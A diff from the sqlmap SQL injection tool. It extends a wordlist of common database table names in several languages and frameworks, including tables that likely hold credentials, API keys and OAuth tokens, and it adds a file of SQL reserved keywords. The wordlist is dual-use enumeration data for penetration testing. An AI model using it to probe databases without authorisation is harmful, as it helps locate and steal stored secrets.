-3009,6 +2630,7 @@ wp_categories chessmessages # site:br + endereco pessoa usuarios @@ -3171,6 +2793,7 @@ LT_CUSTOM2 LT_CUSTOM3 # site:es + jos_respuestas DEPARTAMENTO EMPLEADO @@ -3207,30 +2830,44 @@ nuke_gallery_pictures_newpicture Books grupo facturas +aclaraciones +preguntas +personas +estadisticas # site:cn + +yonghu +dingdan +shangpin +zhanghu +jiaoyi +zhifu +rizhi +quanxian +juese +caidan +xinxi +shuju +guanliyuan +xitong +peizhi +canshu +zidian url -cdb_adminactions BlockInfo -cdb_attachtypes cdb_attachments -mymps_lifebox cdb_buddys -mymps_payapi LastDate cdb_medals -mymps_payrecord cdb_forumlinks cdb_adminnotes cdb_admingroups -cdb_creditslog stkWeight -mymps_checkanswer cdb_announcements cdb_bbcodes cdb_advertisements cdb_memberfields -mymps_telephone cdb_forums cdb_forumfields cdb_favorites @@ -3258,31 +2895,22 @@ cdb_pluginvars pw_smiles cdb_modworks ncat -mymps_member_tpl pw_threads zl_admin cdb_onlinetime cdb_mythreads cdb_members spt_datatype_info -mymps_certification -mymps_badwords seentype -mymps_cache zl_article spt_datatype_info_ext cdb_debateposts -mymps_corp -mymps_member_album mgbliuyan pw_schcache zl_finance pw_banuser -mymps_news cdb_pluginhooks -mymps_member_docutype wp1_categories -cdb_magicmarket MSmerge_errorlineage cdb_activities zl_baoming @@ -3294,18 +2922,15 @@ cdb_itempool phpcms_announce pw_actions pw_msg -mymps_news_img cdb_debates cdb_magiclog pw_forums -mymps_channel cdb_polls t_stat pw_attachs cdb_plugins pw_membercredit cdb_posts -mymps_member_category cdb_activityapplies zl_media acctmanager @@ -3313,18 +2938,12 @@ pw_usergroups cdb_faqs cdb_onlinelist pw_hack -mymps_member_comment Market -mymps_config -mymps_mail_template -mymps_advertisement MSrepl_identity_range pw_favors -mymps_crons pw_config pw_credits cdb_failedlogins -mymps_member_docu pw_posts cdb_attachpaymentlog cdb_myposts @@ -3332,7 +2951,6 @@ cdb_polloptions wp1_comments cdb_caches pw_members -mymps_upload spt_provider_types pw_sharelinks pw_tmsgs @@ -3343,17 +2961,237 @@ aliasregex userfiles acctmanager2 cdb_pmsearchindex -mymps_news_focus cdb_forumrecommend publishers zl_advertisement guanggaotp pw_memberinfo aliastype -mymps_mail_sendlist -mymps_navurl + +# site:tr + +kullanici +kullanicilar +yonetici +yoneticiler +adres +adresler +yayincilar +yayinci +urun +urunler +kategori +kategoriler +ulke +ulkeler +siparis +siparisler +bayi +bayiler +stok +reklam +reklamlar +site +siteler +sayfa +sayfalar +icerik +icerikler +yazi +yazilar +genel +istatistik +istatistikler +duyuru +duyurular +haber +haberler +komisyon +ucret +ucretler +bilgi +basvuru +basvurular +kontak +kontaklar +kisi +kisiler +uye +uyeler +kayıt +kayıtlar +tel +telefon +telefonlar +numaralar +numara +kart +kartlar +kredi +krediler +kredikartı +fiyat +fiyatlar +odeme +odemeler +kategoriler +tbl_Uye +xml_kategoriler +tbl_siparis +tbl_googlemap +tbl_ilce +tbl_yardim +tbl_Resim +tbl_anket +tbl_Rapor +tbl_statsvisit +tbl_ticket +tbl_Cesit +tbl_xml +tbl_Cinsiyet +xml_urunler_temp +tbl_takvim +tbl_altkategori +tbl_mesaj +tbl_Haber +tbl_AdresTemp +tbl_Firma +tbl_Medya +xml_urunlerbirim +tbl_Yardim +tbl_medya +tbl_Video +xml_markalar_transfer +tbl_adrestemp +tbl_online +tbl_sehir +tbl_resim +tbl_Gorsel +tbl_doviz +tbl_gorsel +tbl_kampanya +tbl_Blog +tbl_Banners +tbl_koleksiyon +tbl_Galeri +tbl_Kampanya +tbl_Favori +tbl_sss +tbl_Banner +tbl_Faq +xml_markalar_temp +tbl_faq +tbl_Personel +tbl_Seo +tbl_adres +tbl_ayar +tbl_metin +tbl_AltKategori +tbl_kategori +tbl_Marka +tbl_blogkategori +tbl_ulke +tbl_sepetold +tbl_yorum +tbl_Fiyat +tbl_Reklam +tbl_Kategori +tbl_Yorum +tbl_semt +tbl_Tedarikci +xml_kampanyakategori +tbl_ozelgun +tbl_uyexml +tbl_rapor +tbl_seo +tbl_Indirim +tbl_Ilce +tbl_bulten +tbl_video +tbl_Ayar +tbl_fatura +tbl_cinsiyet +tbl_reklam +tbl_sliders +tbl_KDV +tbl_uye_img +tbl_siparisid +tbl_BlogKategori +tbl_Yonetici +tbl_kdv +tbl_Online +tbl_temsilci +tbl_Dil +tbl_banners +tbl_Mesaj +tbl_Logs +tbl_logs +tbl_fiyat +tbl_SSS +tbl_Puan +tbl_kargo +tbl_Statsvisit +tbl_Koleksiyon +tbl_dil +tbl_Sepetold +tbl_Fatura +tbl_yonetici +tbl_Yazilar +tbl_Temsilci +tbl_Kargo +tbl_cesit +tbl_uye +tbl_haber +tbl_SiparisID +tbl_Adres +tbl_Ozelgun +tbl_banka +tbl_Videogaleri +tbl_galeri +tbl_videogaleri +xml_urunresimleri +tbl_urun +tbl_Ticket +tbl_yazilar +tbl_Ulke +tbl_Urun +tbl_renk +tbl_Harita +tbl_Sepet +tbl_Sehir +tbl_Uye_Img +tbl_Semt +tbl_indirim +xml_kampanyakategori_transfer +tbl_Takvim +tbl_blog +tbl_Sliders +tbl_Renk +tbl_UyeXML +tbl_tedarikci +tbl_Fotogaleri +tbl_Doviz +tbl_Anket +tbl_Banka +tbl_Metin +tbl_XML +tbl_firma +tbl_harita +tbl_banner +tbl_sepet +tbl_fotogaleri +tbl_marka +tbl_Siparis +tbl_personel +tbl_puan +tbl_Bulten +tbl_favori +tbl_onlineusers + + # List provided by Pedrito Perez (0ark1ang3l@gmail.com) + adminstbl admintbl affiliateUsers @@ -3366,3 +3204,219 @@ tuser tusers userstbl usertbl + +# WebGoat + +user_data + +# https://laurent22.github.io/so-injections/ + +accounts +admin +baza_site +benutzer +category +comments +company +credentials +Customer +customers +data +details +dhruv_users +dt_tb +employees +events +forsale +friends +giorni +images +info +items +kontabankowe +login +logs +markers +members +messages +orders +order_table +photos +player +players +points +register +reports +rooms +shells +signup +songs +student +students +table +table2 +tbl_images +tblproduct +testv2 +tickets +topicinfo +trabajo +user +user_auth +userinfo +user_info +userregister +users +usuarios +utenti +wm_products +wp_payout_history +zamowienia + +# https://deliciousbrains.com/tour-wordpress-database/ + +wp_blogmeta +wp_blogs +wp_blog_versions +wp_commentmeta +wp_comments +wp_links +wp_options +wp_postmeta +wp_posts +wp_registration_log +wp_signups +wp_site +wp_sitemeta +wp_termmeta +wp_term_relationships +wp_terms +wp_term_taxonomy +wp_usermeta +wp_users + +# https://docs.joomla.org/Tables + +assets +bannerclient +banner +bannertrack +categories +components +contact_details +content_frontpage +content_rating +content +core_acl_aro_groups +core_acl_aro_map +core_acl_aro_sections +core_acl_aro +core_acl_groups_aro_map +core_log_items +core_log_searches +extensions +groups +languages +menu +menu_types +messages_cfg +messages +migration_backlinks +modules_menu +modules +newsfeeds +plugins +poll_data +poll_date +poll_menu +polls +redirect_links +Schemas +sections +session +stats_agents +templates_menu +template_styles +update_categories +update_sites_extensions +update_sites +updates +usergroups +user_profiles +users +user_usergroup_map +viewlevels +weblinks + +# site:nl + +gebruikers + +# asp.net + +AspNetUsers +AspNetRoles +AspNetUserRoles +AspNetUserClaims +AspNetUserLogins +AspNetRoleClaims +AspNetUserTokens +__EFMigrationsHistory + +# django + +auth_user +auth_group +auth_permission +django_session +django_migrations +django_content_type +django_admin_log + +# laravel + +migrations +password_resets +failed_jobs +personal_access_tokens +job_batches +model_has_roles +model_has_permissions +role_has_permissions + +# rails + +schema_migrations +ar_internal_metadata +active_storage_blobs +active_storage_attachments + +# misc. + +flyway_schema_history +databasechangelog +databasechangeloglock +alembic_version +knex_migrations +knex_migrations_lock +doctrine_migration_versions +api_keys +api_tokens +access_tokens +refresh_tokens +oauth_clients +oauth_access_tokens +oauth_refresh_tokens +webhooks +webhook_events +secrets +credentials +audit_logs +activity_logs +system_settings +feature_flags +tenants +subscriptions +users_bak +users_old +orders_backup diff --git a/data/txt/keywords.txt b/data/txt/keywords.txt new file mode 100644 index 00000000000..36d2773ef44 --- /dev/null +++ b/data/txt/keywords.txt @@ -0,0 +1,1635 @@ +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) + +ABSOLUTE +ACTION +ADD +ALL +ALLOCATE +ALTER +AND +ANY +ARE +AS +ASC +ASSERTION +AT +AUTHORIZATION +AVG +BEGIN +BETWEEN +BIT +BIT_LENGTH +BOTH +BY +CALL +CASCADE +CASCADED +CASE +CAST +CATALOG +CHAR +CHAR_LENGTH +CHARACTER +CHARACTER_LENGTH +CHECK +CLOSE +COALESCE +COLLATE +COLLATION +COLUMN +COMMIT +CONDITION +CONNECT +CONNECTION +CONSTRAINT +CONSTRAINTS +CONTAINS +CONTINUE +CONVERT +CORRESPONDING +COUNT +CREATE +CROSS +CURRENT +CURRENT_DATE +CURRENT_PATH +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +DATE +DAY +DEALLOCATE +DEC +DECIMAL +DECLARE +DEFAULT +DEFERRABLE +DEFERRED +DELETE +DESC +DESCRIBE +DESCRIPTOR +DETERMINISTIC +DIAGNOSTICS +DISCONNECT +DISTINCT +DO +DOMAIN +DOUBLE +DROP +ELSE +ELSEIF +END +ESCAPE +EXCEPT +EXCEPTION +EXEC +EXECUTE +EXISTS +EXIT +EXTERNAL +EXTRACT +FALSE +FETCH +FIRST +FLOAT +FOR +FOREIGN +FOUND +FROM +FULL +FUNCTION +GET +GLOBAL +GO +GOTO +GRANT +GROUP +HANDLER +HAVING +HOUR +IDENTITY +IF +IMMEDIATE +IN +INDICATOR +INITIALLY +INNER +INOUT +INPUT +INSENSITIVE +INSERT +INT +INTEGER +INTERSECT +INTERVAL +INTO +IS +ISOLATION +JOIN +KEY +LANGUAGE +LAST +LEADING +LEAVE +LEFT +LEVEL +LIKE +LOCAL +LOOP +LOWER +MATCH +MAX +MIN +MINUTE +MODULE +MONTH +NAMES +NATIONAL +NATURAL +NCHAR +NEXT +NO +NOT +NULL +NULLIF +NUMERIC +OCTET_LENGTH +OF +ON +ONLY +OPEN +OPTION +OR +ORDER +OUT +OUTER +OUTPUT +OVERLAPS +PAD +PARAMETER +PARTIAL +PATH +POSITION +PRECISION +PREPARE +PRESERVE +PRIMARY +PRIOR +PRIVILEGES +PROCEDURE +READ +REAL +REFERENCES +RELATIVE +REPEAT +RESIGNAL +RESTRICT +RETURN +RETURNS +REVOKE +RIGHT +ROLLBACK +ROUTINE +ROWS +SCHEMA +SCROLL +SECOND +SECTION +SELECT +SESSION +SESSION_USER +SET +SIGNAL +SIZE +SMALLINT +SOME +SPACE +SPECIFIC +SQL +SQLCODE +SQLERROR +SQLEXCEPTION +SQLSTATE +SQLWARNING +SUBSTRING +SUM +SYSTEM_USER +TABLE +TEMPORARY +THEN +TIME +TIMESTAMP +TIMEZONE_HOUR +TIMEZONE_MINUTE +TO +TRAILING +TRANSACTION +TRANSLATE +TRANSLATION +TRIM +TRUE +UNDO +UNION +UNIQUE +UNKNOWN +UNTIL +UPDATE +UPPER +USAGE +USER +USING +VALUE +VALUES +VARCHAR +VARYING +VIEW +WHEN +WHENEVER +WHERE +WHILE +WITH +WORK +WRITE +YEAR +ZONE + +# MySQL 5.0 keywords (reference: http://dev.mysql.com/doc/refman/5.0/en/reserved-words.html) + +ADD +ALL +ALTER +ANALYZE +AND +ASASC +ASENSITIVE +BEFORE +BETWEEN +BIGINT +BINARYBLOB +BOTH +BY +CALL +CASCADE +CASECHANGE +CAST +CHAR +CHARACTER +CHECK +COLLATE +COLUMN +CONCAT +CONDITIONCONSTRAINT +CONTINUE +CONVERT +CREATE +CROSS +CURRENT_DATE +CURRENT_TIMECURRENT_TIMESTAMP +CURRENT_USER +CURSOR +DATABASE +DATABASES +DAY_HOUR +DAY_MICROSECONDDAY_MINUTE +DAY_SECOND +DEC +DECIMAL +DECLARE +DEFAULTDELAYED +DELETE +DESC +DESCRIBE +DETERMINISTIC +DISTINCTDISTINCTROW +DIV +DOUBLE +DROP +DUAL +EACH +ELSEELSEIF +ENCLOSED +ESCAPED +EXISTS +EXIT +EXPLAIN +FALSEFETCH +FLOAT +FLOAT4 +FLOAT8 +FOR +FORCE +FOREIGNFROM +FULLTEXT +GRANT +GROUP +HAVING +HIGH_PRIORITYHOUR_MICROSECOND +HOUR_MINUTE +HOUR_SECOND +IF +IFNULL +IGNORE +ININDEX +INFILE +INNER +INOUT +INSENSITIVE +INSERT +INTINT1 +INT2 +INT3 +INT4 +INT8 +INTEGER +INTERVALINTO +IS +ISNULL +ITERATE +JOIN +KEY +KEYS +KILLLEADING +LEAVE +LEFT +LIKE +LIMIT +LINESLOAD +LOCALTIME +LOCALTIMESTAMP +LOCK +LONG +LONGBLOBLONGTEXT +LOOP +LOW_PRIORITY +MATCH +MEDIUMBLOB +MEDIUMINT +MEDIUMTEXTMIDDLEINT +MINUTE_MICROSECOND +MINUTE_SECOND +MOD +MODIFIES +NATURAL +NOTNO_WRITE_TO_BINLOG +NULL +NUMERIC +ON +OPTIMIZE +OPTION +OPTIONALLYOR +ORDER +OUT +OUTER +OUTFILE +PRECISIONPRIMARY +PROCEDURE +PURGE +READ +READS +REALREFERENCES +REGEXP +RELEASE +RENAME +REPEAT +REPLACE +REQUIRERESTRICT +RETURN +REVOKE +RIGHT +RLIKE +SCHEMA +SCHEMASSECOND_MICROSECOND +SELECT +SENSITIVE +SEPARATOR +SET +SHOW +SMALLINTSONAME +SPATIAL +SPECIFIC +SQL +SQLEXCEPTION +SQLSTATESQLWARNING +SQL_BIG_RESULT +SQL_CALC_FOUND_ROWS +SQL_SMALL_RESULT +SSL +STARTINGSTRAIGHT_JOIN +TABLE +TERMINATED +THEN +TINYBLOB +TINYINT +TINYTEXTTO +TRAILING +TRIGGER +TRUE +UNDO +UNION +UNIQUEUNLOCK +UNSIGNED +UPDATE +USAGE +USE +USING +UTC_DATEUTC_TIME +UTC_TIMESTAMP +VALUES +VARBINARY +VARCHAR +VARCHARACTERVARYING +VERSION +WHEN +WHERE +WHILE +WITH +WRITEXOR +YEAR_MONTH +ZEROFILL + +# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html) + +ACCESSIBLE +ACCOUNT +ACTION +ACTIVE +ADD +ADMIN +AFTER +AGAINST +AGGREGATE +ALGORITHM +ALL +ALTER +ALWAYS +ANALYSE +ANALYZE +AND +ANY +ARRAY +AS +ASC +ASCII +ASENSITIVE +AT +ATTRIBUTE +AUTHENTICATION +AUTOEXTEND_SIZE +AUTO_INCREMENT +AVG +AVG_ROW_LENGTH +BACKUP +BEFORE +BEGIN +BETWEEN +BIGINT +BINARY +BINLOG +BIT +BLOB +BLOCK +BOOL +BOOLEAN +BOTH +BTREE +BUCKETS +BULK +BY +BYTE +CACHE +CALL +CASCADE +CASCADED +CASE +CATALOG_NAME +CHAIN +CHALLENGE_RESPONSE +CHANGE +CHANGED +CHANNEL +CHAR +CHARACTER +CHARSET +CHECK +CHECKSUM +CIPHER +CLASS_ORIGIN +CLIENT +CLONE +CLOSE +COALESCE +CODE +COLLATE +COLLATION +COLUMN +COLUMNS +COLUMN_FORMAT +COLUMN_NAME +COMMENT +COMMIT +COMMITTED +COMPACT +COMPLETION +COMPONENT +COMPRESSED +COMPRESSION +CONCURRENT +CONDITION +CONNECTION +CONSISTENT +CONSTRAINT +CONSTRAINT_CATALOG +CONSTRAINT_NAME +CONSTRAINT_SCHEMA +CONTAINS +CONTEXT +CONTINUE +CONVERT +CPU +CREATE +CROSS +CUBE +CUME_DIST +CURRENT +CURRENT_DATE +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +CURSOR_NAME +DATA +DATABASE +DATABASES +DATAFILE +DATE +DATETIME +DAY +DAY_HOUR +DAY_MICROSECOND +DAY_MINUTE +DAY_SECOND +DEALLOCATE +DEC +DECIMAL +DECLARE +DEFAULT +DEFAULT_AUTH +DEFINER +DEFINITION +DELAYED +DELAY_KEY_WRITE +DELETE +DENSE_RANK +DESC +DESCRIBE +DESCRIPTION +DES_KEY_FILE +DETERMINISTIC +DIAGNOSTICS +DIRECTORY +DISABLE +DISCARD +DISK +DISTINCT +DISTINCTROW +DIV +DO +DOUBLE +DROP +DUAL +DUMPFILE +DUPLICATE +DYNAMIC +EACH +ELSE +ELSEIF +EMPTY +ENABLE +ENCLOSED +ENCRYPTION +END +ENDS +ENFORCED +ENGINE +ENGINES +ENGINE_ATTRIBUTE +ENUM +ERROR +ERRORS +ESCAPE +ESCAPED +EVENT +EVENTS +EVERY +EXCEPT +EXCHANGE +EXCLUDE +EXECUTE +EXISTS +EXIT +EXPANSION +EXPIRE +EXPLAIN +EXPORT +EXTENDED +EXTENT_SIZE +FACTOR +FAILED_LOGIN_ATTEMPTS +FALSE +FAST +FAULTS +FETCH +FIELDS +FILE +FILE_BLOCK_SIZE +FILTER +FINISH +FIRST +FIRST_VALUE +FIXED +FLOAT +FLOAT4 +FLOAT8 +FLUSH +FOLLOWING +FOLLOWS +FOR +FORCE +FOREIGN +FORMAT +FOUND +FROM +FULL +FULLTEXT +FUNCTION +GENERAL +GENERATE +GENERATED +GEOMCOLLECTION +GEOMETRY +GEOMETRYCOLLECTION +GET +GET_FORMAT +GET_MASTER_PUBLIC_KEY +GET_SOURCE_PUBLIC_KEY +GLOBAL +GRANT +GRANTS +GROUP +GROUPING +GROUPS +GROUP_REPLICATION +GTID_ONLY +HANDLER +HASH +HAVING +HELP +HIGH_PRIORITY +HISTOGRAM +HISTORY +HOST +HOSTS +HOUR +HOUR_MICROSECOND +HOUR_MINUTE +HOUR_SECOND +IDENTIFIED +IF +IGNORE +IGNORE_SERVER_IDS +IMPORT +IN +INACTIVE +INDEX +INDEXES +INFILE +INITIAL +INITIAL_SIZE +INITIATE +INNER +INOUT +INSENSITIVE +INSERT +INSERT_METHOD +INSTALL +INSTANCE +INT +INT1 +INT2 +INT3 +INT4 +INT8 +INTEGER +INTERSECT +INTERVAL +INTO +INVISIBLE +INVOKER +IO +IO_AFTER_GTIDS +IO_BEFORE_GTIDS +IO_THREAD +IPC +IS +ISOLATION +ISSUER +ITERATE +JOIN +JSON +JSON_TABLE +JSON_VALUE +KEY +KEYRING +KEYS +KEY_BLOCK_SIZE +KILL +LAG +LANGUAGE +LAST +LAST_VALUE +LATERAL +LEAD +LEADING +LEAVE +LEAVES +LEFT +LESS +LEVEL +LIKE +LIMIT +LINEAR +LINES +LINESTRING +LIST +LOAD +LOCAL +LOCALTIME +LOCALTIMESTAMP +LOCK +LOCKED +LOCKS +LOGFILE +LOGS +LONG +LONGBLOB +LONGTEXT +LOOP +LOW_PRIORITY +MASTER +MASTER_AUTO_POSITION +MASTER_BIND +MASTER_COMPRESSION_ALGORITHMS +MASTER_CONNECT_RETRY +MASTER_DELAY +MASTER_HEARTBEAT_PERIOD +MASTER_HOST +MASTER_LOG_FILE +MASTER_LOG_POS +MASTER_PASSWORD +MASTER_PORT +MASTER_PUBLIC_KEY_PATH +MASTER_RETRY_COUNT +MASTER_SERVER_ID +MASTER_SSL +MASTER_SSL_CA +MASTER_SSL_CAPATH +MASTER_SSL_CERT +MASTER_SSL_CIPHER +MASTER_SSL_CRL +MASTER_SSL_CRLPATH +MASTER_SSL_KEY +MASTER_SSL_VERIFY_SERVER_CERT +MASTER_TLS_CIPHERSUITES +MASTER_TLS_VERSION +MASTER_USER +MASTER_ZSTD_COMPRESSION_LEVEL +MATCH +MAXVALUE +MAX_CONNECTIONS_PER_HOUR +MAX_QUERIES_PER_HOUR +MAX_ROWS +MAX_SIZE +MAX_UPDATES_PER_HOUR +MAX_USER_CONNECTIONS +MEDIUM +MEDIUMBLOB +MEDIUMINT +MEDIUMTEXT +MEMBER +MEMORY +MERGE +MESSAGE_TEXT +MICROSECOND +MIDDLEINT +MIGRATE +MINUTE +MINUTE_MICROSECOND +MINUTE_SECOND +MIN_ROWS +MOD +MODE +MODIFIES +MODIFY +MONTH +MULTILINESTRING +MULTIPOINT +MULTIPOLYGON +MUTEX +MYSQL_ERRNO +NAME +NAMES +NATIONAL +NATURAL +NCHAR +NDB +NDBCLUSTER +NESTED +NETWORK_NAMESPACE +NEVER +NEW +NEXT +NO +NODEGROUP +NONE +NOT +NOWAIT +NO_WAIT +NO_WRITE_TO_BINLOG +NTH_VALUE +NTILE +NULL +NULLS +NUMBER +NUMERIC +NVARCHAR +OF +OFF +OFFSET +OJ +OLD +ON +ONE +ONLY +OPEN +OPTIMIZE +OPTIMIZER_COSTS +OPTION +OPTIONAL +OPTIONALLY +OPTIONS +OR +ORDER +ORDINALITY +ORGANIZATION +OTHERS +OUT +OUTER +OUTFILE +OVER +OWNER +PACK_KEYS +PAGE +PARSER +PARTIAL +PARTITION +PARTITIONING +PARTITIONS +PASSWORD_LOCK_TIME +PATH +PERCENT_RANK +PERSIST +PERSIST_ONLY +PHASE +PLUGIN +PLUGINS +PLUGIN_DIR +POINT +POLYGON +PORT +PRECEDES +PRECEDING +PRECISION +PREPARE +PRESERVE +PREV +PRIMARY +PRIVILEGES +PRIVILEGE_CHECKS_USER +PROCEDURE +PROCESS +PROCESSLIST +PROFILE +PROFILES +PROXY +PURGE +QUARTER +QUERY +QUICK +RANDOM +RANGE +RANK +READ +READS +READ_ONLY +READ_WRITE +REAL +REBUILD +RECOVER +RECURSIVE +REDOFILE +REDO_BUFFER_SIZE +REDUNDANT +REFERENCE +REFERENCES +REGEXP +REGISTRATION +RELAY +RELAYLOG +RELAY_LOG_FILE +RELAY_LOG_POS +RELAY_THREAD +RELEASE +RELOAD +REMOTE +REMOVE +RENAME +REORGANIZE +REPAIR +REPEAT +REPEATABLE +REPLACE +REPLICA +REPLICAS +REPLICATE_DO_DB +REPLICATE_DO_TABLE +REPLICATE_IGNORE_DB +REPLICATE_IGNORE_TABLE +REPLICATE_REWRITE_DB +REPLICATE_WILD_DO_TABLE +REPLICATE_WILD_IGNORE_TABLE +REPLICATION +REQUIRE +REQUIRE_ROW_FORMAT +RESET +RESIGNAL +RESOURCE +RESPECT +RESTART +RESTORE +RESTRICT +RESUME +RETAIN +RETURN +RETURNED_SQLSTATE +RETURNING +RETURNS +REUSE +REVERSE +REVOKE +RIGHT +RLIKE +ROLE +ROLLBACK +ROLLUP +ROTATE +ROUTINE +ROW +ROWS +ROW_COUNT +ROW_FORMAT +ROW_NUMBER +RTREE +SAVEPOINT +SCHEDULE +SCHEMA +SCHEMAS +SCHEMA_NAME +SECOND +SECONDARY +SECONDARY_ENGINE +SECONDARY_ENGINE_ATTRIBUTE +SECONDARY_LOAD +SECONDARY_UNLOAD +SECOND_MICROSECOND +SECURITY +SELECT +SENSITIVE +SEPARATOR +SERIAL +SERIALIZABLE +SERVER +SESSION +SET +SHARE +SHOW +SHUTDOWN +SIGNAL +SIGNED +SIMPLE +SKIP +SLAVE +SLOW +SMALLINT +SNAPSHOT +SOCKET +SOME +SONAME +SOUNDS +SOURCE +SOURCE_AUTO_POSITION +SOURCE_BIND +SOURCE_COMPRESSION_ALGORITHMS +SOURCE_CONNECT_RETRY +SOURCE_DELAY +SOURCE_HEARTBEAT_PERIOD +SOURCE_HOST +SOURCE_LOG_FILE +SOURCE_LOG_POS +SOURCE_PASSWORD +SOURCE_PORT +SOURCE_PUBLIC_KEY_PATH +SOURCE_RETRY_COUNT +SOURCE_SSL +SOURCE_SSL_CA +SOURCE_SSL_CAPATH +SOURCE_SSL_CERT +SOURCE_SSL_CIPHER +SOURCE_SSL_CRL +SOURCE_SSL_CRLPATH +SOURCE_SSL_KEY +SOURCE_SSL_VERIFY_SERVER_CERT +SOURCE_TLS_CIPHERSUITES +SOURCE_TLS_VERSION +SOURCE_USER +SOURCE_ZSTD_COMPRESSION_LEVEL +SPATIAL +SPECIFIC +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQL_AFTER_GTIDS +SQL_AFTER_MTS_GAPS +SQL_BEFORE_GTIDS +SQL_BIG_RESULT +SQL_BUFFER_RESULT +SQL_CACHE +SQL_CALC_FOUND_ROWS +SQL_NO_CACHE +SQL_SMALL_RESULT +SQL_THREAD +SQL_TSI_DAY +SQL_TSI_HOUR +SQL_TSI_MINUTE +SQL_TSI_MONTH +SQL_TSI_QUARTER +SQL_TSI_SECOND +SQL_TSI_WEEK +SQL_TSI_YEAR +SRID +SSL +STACKED +START +STARTING +STARTS +STATS_AUTO_RECALC +STATS_PERSISTENT +STATS_SAMPLE_PAGES +STATUS +STOP +STORAGE +STORED +STRAIGHT_JOIN +STREAM +STRING +SUBCLASS_ORIGIN +SUBJECT +SUBPARTITION +SUBPARTITIONS +SUPER +SUSPEND +SWAPS +SWITCHES +SYSTEM +TABLE +TABLES +TABLESPACE +TABLE_CHECKSUM +TABLE_NAME +TEMPORARY +TEMPTABLE +TERMINATED +TEXT +THAN +THEN +THREAD_PRIORITY +TIES +TIME +TIMESTAMP +TIMESTAMPADD +TIMESTAMPDIFF +TINYBLOB +TINYINT +TINYTEXT +TLS +TO +TRAILING +TRANSACTION +TRIGGER +TRIGGERS +TRUE +TRUNCATE +TYPE +TYPES +UNBOUNDED +UNCOMMITTED +UNDEFINED +UNDO +UNDOFILE +UNDO_BUFFER_SIZE +UNICODE +UNINSTALL +UNION +UNIQUE +UNKNOWN +UNLOCK +UNREGISTER +UNSIGNED +UNTIL +UPDATE +UPGRADE +URL +USAGE +USE +USER +USER_RESOURCES +USE_FRM +USING +UTC_DATE +UTC_TIME +UTC_TIMESTAMP +VALIDATION +VALUE +VALUES +VARBINARY +VARCHAR +VARCHARACTER +VARIABLES +VARYING +VCPU +VIEW +VIRTUAL +VISIBLE +WAIT +WARNINGS +WEEK +WEIGHT_STRING +WHEN +WHERE +WHILE +WINDOW +WITH +WITHOUT +WORK +WRAPPER +WRITE +X509 +XA +XID +XML +XOR +YEAR +YEAR_MONTH +ZEROFILL +ZONE + +# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html) + +ABS +ACOS +ALL +ALLOCATE +ALTER +ANALYSE +ANALYZE +AND +ANY +ARE +ARRAY +ARRAY_AGG +ARRAY_MAX_CARDINALITY +AS +ASC +ASENSITIVE +ASIN +ASYMMETRIC +AT +ATAN +ATOMIC +AUTHORIZATION +AVG +BEGIN +BEGIN_FRAME +BEGIN_PARTITION +BETWEEN +BIGINT +BINARY +BLOB +BOOLEAN +BOTH +BY +CALL +CALLED +CARDINALITY +CASCADED +CASE +CAST +CEIL +CEILING +CHAR +CHARACTER +CHARACTER_LENGTH +CHAR_LENGTH +CHECK +CLASSIFIER +CLOB +CLOSE +COALESCE +COLLATE +COLLATION +COLLECT +COLUMN +COMMIT +CONCURRENTLY +CONDITION +CONNECT +CONSTRAINT +CONTAINS +CONVERT +COPY +CORR +CORRESPONDING +COS +COSH +COUNT +COVAR_POP +COVAR_SAMP +CREATE +CROSS +CUBE +CUME_DIST +CURRENT +CURRENT_CATALOG +CURRENT_DATE +CURRENT_DEFAULT_TRANSFORM_GROUP +CURRENT_PATH +CURRENT_ROLE +CURRENT_ROW +CURRENT_SCHEMA +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_TRANSFORM_GROUP_FOR_TYPE +CURRENT_USER +CURSOR +CYCLE +DATALINK +DATE +DAY +DEALLOCATE +DEC +DECFLOAT +DECIMAL +DECLARE +DEFAULT +DEFERRABLE +DEFINE +DELETE +DENSE_RANK +DEREF +DESC +DESCRIBE +DETERMINISTIC +DISCONNECT +DISTINCT +DLNEWCOPY +DLPREVIOUSCOPY +DLURLCOMPLETE +DLURLCOMPLETEONLY +DLURLCOMPLETEWRITE +DLURLPATH +DLURLPATHONLY +DLURLPATHWRITE +DLURLSCHEME +DLURLSERVER +DLVALUE +DO +DOUBLE +DROP +DYNAMIC +EACH +ELEMENT +ELSE +EMPTY +END +END-EXEC +END_FRAME +END_PARTITION +EQUALS +ESCAPE +EVERY +EXCEPT +EXEC +EXECUTE +EXISTS +EXP +EXTERNAL +EXTRACT +FALSE +FETCH +FILTER +FIRST_VALUE +FLOAT +FLOOR +FOR +FOREIGN +FRAME_ROW +FREE +FREEZE +FROM +FULL +FUNCTION +FUSION +GET +GLOBAL +GRANT +GROUP +GROUPING +GROUPS +HAVING +HOLD +HOUR +IDENTITY +ILIKE +IMPORT +IN +INDICATOR +INITIAL +INITIALLY +INNER +INOUT +INSENSITIVE +INSERT +INT +INTEGER +INTERSECT +INTERSECTION +INTERVAL +INTO +IS +ISNULL +JOIN +JSON_ARRAY +JSON_ARRAYAGG +JSON_EXISTS +JSON_OBJECT +JSON_OBJECTAGG +JSON_QUERY +JSON_TABLE +JSON_TABLE_PRIMITIVE +JSON_VALUE +LAG +LANGUAGE +LARGE +LAST_VALUE +LATERAL +LEAD +LEADING +LEFT +LIKE +LIKE_REGEX +LIMIT +LISTAGG +LN +LOCAL +LOCALTIME +LOCALTIMESTAMP +LOG +LOG10 +LOWER +MATCH +MATCHES +MATCH_NUMBER +MATCH_RECOGNIZE +MAX +MEASURES +MEMBER +MERGE +METHOD +MIN +MINUTE +MOD +MODIFIES +MODULE +MONTH +MULTISET +NATIONAL +NATURAL +NCHAR +NCLOB +NEW +NO +NONE +NORMALIZE +NOT +NOTNULL +NTH_VALUE +NTILE +NULL +NULLIF +NUMERIC +OCCURRENCES_REGEX +OCTET_LENGTH +OF +OFFSET +OLD +OMIT +ON +ONE +ONLY +OPEN +OR +ORDER +OUT +OUTER +OVER +OVERLAPS +OVERLAY +PARAMETER +PARTITION +PATTERN +PER +PERCENT 